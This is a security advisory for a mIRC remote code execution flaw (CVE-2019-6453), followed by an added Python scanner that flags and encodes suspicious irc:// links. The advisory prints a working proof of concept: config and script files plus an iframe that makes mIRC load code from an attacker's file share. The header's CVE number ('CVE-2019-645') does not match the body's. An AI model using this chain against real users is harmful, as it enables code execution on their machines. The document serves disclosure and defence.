mIRC Remote Command Execution

18 Feb 2019 | Reported by Baptiste Devigne | Type: packetstorm | Source: packetstormsecurity.com

mIRC Remote Command Execution CVE-2019-645

`# Exploit Title: RCE on mIRC <7.55 using argument injection through custom URI protocol handlers  
# Date: 18/02/2019  
# Exploit Author: https://twitter.com/proofofcalc/  
# Vendor Homepage: https://www.mirc.com  
# Software Link: https://www.mirc.com/get.php  
# Version: < 7.55  
# Tested on: Windows  
# CVE : CVE-2019-6453  
  
RCE through URI protocol handlers on mIRC <7.55 (CVE-2019-6453)  
===============================================================  
  
Severity: High  
  
mIRC has been shown to be vulnerable to argument injection through its  
associated URI protocol handlers that improperly escape their parameters.  
Using available command-line parameters, an attacker is able to load a remote  
configuration file and to automatically run arbitrary code.  
  
Because mIRC doesn't use any kind of sigil such as -- to mark  
the end of the argument list, an attacker is able to pass arguments to mIRC  
through an irc:// link and execute arbitrary code by loading a custom mirc.ini  
from an attacker-controlled Samba file server. Please note that ircs:// works  
the same way.  
  
  
PoC  
===  
  
The proof of calc requires three files: mirc.ini, calc.ini and poc.html.  
We assume a Samba file server is running on the attacker's side. For the  
sake of the example, the following pieces of code assume it is running on  
host 127.0.0.1 (i.e. replace 127.0.0.1 by your own server's address in  
the following files to try this out).  
  
mirc.ini  
========  
  
mirc.ini is a custom configuration file that should be located at  
C:\mirc-poc\mirc.ini on the file server.  
  
[rfiles]  
n2=\\127.0.0.1\C$\mirc-poc\calc.ini  
  
calc.ini  
========  
  
calc.ini is a remote script file that should be located at  
C:\mirc-poc\calc.ini on the file server.  
  
[script]  
n0=on *:START: {  
n1= /run calc.exe  
n2=}  
  
poc.html  
========  
  
Just visiting poc.html should work assuming mIRC is set as the default  
handler for the irc:// URI scheme and the browser does not encode the payload.  
Depending on the browser and your configuration, you might still get a prompt  
(not the case on Firefox).  
  
<iframe src='irc://? -i\\127.0.0.1\C$\mirc-poc\mirc.ini' />  
  
Affected versions  
=================  
  
This PoC runs for mIRC <7.55.  
  
You can trigger the PoC on Edge 42.17134 (last preview version) and  
Firefox 64.0.2 (last release). It doesn't work on Chrome because of the way  
Chrome handles URI protocols (the URI is encoded before being passed to the  
application).  
  
References  
==========  
  
Further explanation (including proof of concept code):  
  
Write-up:  
https://proofofcalc.com/cve-2019-6453-mIRC/  
  
PoC:  
https://github.com/proofofcalc/cve-2019-6453-poc  
  
mIRC changelog:  
https://www.mirc.com/whatsnew.txt  
  
Authors  
=======  
  
Baptiste Devigne (Geluchat) and Benjamin Chetioui (SIben)  
`
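
Added example, not part of the original advisory or the authors' PoC: a Python check that flags irc:// and ircs:// links whose raw form would split into extra command-line arguments (whitespace, an option-like token, a UNC path), together with the percent-encoding the advisory credits with stopping the PoC on Chrome. The function names, regexes, safe-character set and sample HTML (host fileserver.example) are constructed for illustration.

```python
import re
from urllib.parse import quote

# Constructed sample page: one ordinary link, one link shaped like the advisory's PoC.
SAMPLE_HTML = r"""
<a href="irc://irc.example.net:6667/#help">join #help</a>
<iframe src='ircs://? -i\\fileserver.example\share\mirc.ini'></iframe>
"""

URI_RE = re.compile(r"""\bircs?://[^'"<>\r\n]*""", re.IGNORECASE)
SWITCH_RE = re.compile(r"\s-\w")        # whitespace followed by an option-like token
UNC_RE = re.compile(r"\\\\[^\\\s]+\\")  # \\host\share style path


def findings(uri):
    """Return the reasons one irc:// or ircs:// URI looks like argument injection."""
    reasons = []
    if re.search(r"\s", uri):
        reasons.append("whitespace")    # would split the handler's command line
    if SWITCH_RE.search(uri):
        reasons.append("switch")
    if UNC_RE.search(uri):
        reasons.append("unc-path")
    return reasons


def scan(text):
    """Extract irc/ircs URIs from HTML text and keep only the suspicious ones."""
    hits = []
    for match in URI_RE.finditer(text):
        uri = match.group(0).rstrip()
        reasons = findings(uri)
        if reasons:
            hits.append((uri, reasons))
    return hits


def encode_for_handler(uri):
    """Percent-encode everything outside a conservative safe set (an assumption,
    not Chrome's exact rule) so the URI reaches the handler as a single token."""
    scheme, sep, rest = uri.partition("://")
    return scheme + sep + quote(rest, safe="/:@?&=#,+%")


if __name__ == "__main__":
    for uri, reasons in scan(SAMPLE_HTML):
        print("suspicious:", uri, reasons)
        print("encoded:   ", encode_for_handler(uri))
```

The same `findings` check can be run on links before they are handed to the operating system's protocol handler, rejecting or encoding any that are flagged.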
